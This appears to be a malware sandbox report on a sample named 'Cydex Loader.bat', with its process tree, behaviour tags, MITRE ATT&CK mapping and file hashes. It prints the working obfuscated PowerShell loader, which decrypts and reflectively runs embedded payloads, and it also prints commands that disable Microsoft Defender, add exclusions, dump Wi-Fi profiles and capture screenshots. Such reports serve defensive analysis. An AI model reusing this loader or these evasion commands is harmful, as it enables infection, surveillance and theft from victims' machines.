C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O4mKwgT14Jf4GENcRygUG/d4BtYwQICwFCslZ/2DwpA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+iqDLVr+MkpW6N2Dl88sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gDOoY=New-Object System.IO.MemoryStream(,$param_var); $PYRCo=New-Object System.IO.MemoryStream; $UyrQy=New-Object System.IO.Compression.GZipStream($gDOoY, [IO.Compression.CompressionMode]::Decompress); $UyrQy.CopyTo($PYRCo); $UyrQy.Dispose(); $gDOoY.Dispose(); $PYRCo.Dispose(); $PYRCo.ToArray();}function execute_function($param_var,$param2_var){ $hsmns=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AqQxc=$hsmns.EntryPoint; $AqQxc.Invoke($null, $param2_var);}$oCUbh = 'C:\Users\Admin\AppData\Local\Temp\Cydex Loader.bat';$host.UI.RawUI.WindowTitle = $oCUbh;$MzdzK=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oCUbh).Split([Environment]::NewLine);foreach ($PIGwG in $MzdzK) { if ($PIGwG.StartsWith('hbEHolpLBZhWCglFYGUC')) { $ubKDq=$PIGwG.Substring(20); break; }}$payloads_var=[string[]]$ubKDq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:3948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Drivers directory
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe4⤵
- Drops file in System32 directory
- Views/modifies file attributes
PID:2184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2828
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe4⤵
- Views/modifies file attributes
PID:2996
-
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption4⤵PID:924
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name4⤵PID:1748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4160
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2148
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:4020
-
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4896
-
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4964
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3148 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y0usiqio\y0usiqio.cmdline"5⤵PID:5076
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES431.tmp" "c:\Users\Admin\AppData\Local\Temp\y0usiqio\CSCFC90D99ABC045BC82CACA452B74165.TMP"6⤵PID:4760
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4548
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:1304
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:764
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
944B
MD562d94562013cad250e309b4091503254
SHA1f658f6e53e980694f5ff5bae10455c21ee059a2e
SHA2561ff2d02730e490230262e82169d667b1db011b405f53b3bb4345ed1ee3efc1d5
SHA512282e6777407b759ba15e7410cefc8652ae362a5e9ae13dfb355a3044154ca018a8de2b98df0e83012ae98279480ee3b517c62d33c8122f078ea5f3732aaa2a97
-
Filesize
1KB
MD5fb93d15c1450dd17fb3864a9de6ff3c9
SHA1b83d2aedf0bec9757fde8df74d35fefcdf82dc06
SHA256377769fb875148133467e39fb4edb154b4de766acd8b57c76359a7f48dec7ce5
SHA512a7abbc4b005be7df9c3e2593559d69ceb6effc17fcb4332d9368dee11f86c24c713ae39b06978b6d195e3dc7f822c7baee2bed54b3aaa730063c3c925f070657
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
434KB
MD5ab8cc043ba15e2deb92c7d6c6c062a7c
SHA102b97581e232e206000ba914c4dd6f052a08479f
SHA256b67d9cff987979f49c14eaca055d8a476799f724fdb57e53045f06531260542e
SHA512d586e4efcec2d0838145eac2d77c7b2220b8233a2301887d27eb857dbac23637bc554094d130facb58b39324177699daae69ed50109596f90d134d3922a4d3ba
-
Filesize
4KB
MD5be49a8700c8e2387466acfb4b460254d
SHA1cfd412da9dd01ce05c4004da804e1c15aa5e1971
SHA2562724830f790ee55a37f0437714a3e34a5a930421584053772128015a59a1aa23
SHA51272fdac4f19bed663086cce358b71ae22e171e874018ee7a03b83939bfe63492c2ac0d27e0bbc0baa8c5d84992a2416cf3848cdcb08385d37abf01b4dded506ae
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
2KB
MD56e2386469072b80f18d5722d07afdc0b
SHA1032d13e364833d7276fcab8a5b2759e79182880f
SHA256ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075
SHA512e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb
-
Filesize
652B
MD5baed9fda34c44a7370a69ecf8c2ca846
SHA13ea236f4cd4551a44239257f482640f6ccbbad0d
SHA256193cbcd6c21d81f455d68fbefead575b00054d45b3cd34e269e7ec5e1ecc5fb1
SHA512de1d61832d35c51d49600304bdcdd668b2360dc013b22be6064221f6368ec9abbfd6c9c5e8fa6cd79cca2586522c00ac5679e69c534d973ed19aace75582f366
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD55d72ca2d49f125c8cc03c8cce13cecc3
SHA144b611492eeb66e2a798581898439818f0bfc524
SHA25646466b4e8427d3a01f7afbc2c86c27f6e99fb009ac9a879609e9263282b4d631
SHA512d630b1cd58a900cd79726351ddbbc889006b92ec6804db1ff9393954bee9ba7e6f400ea7cc9234d1229f8f0e2b7f2d37409c3b1c2c3e04a7eeb1828b87e2849f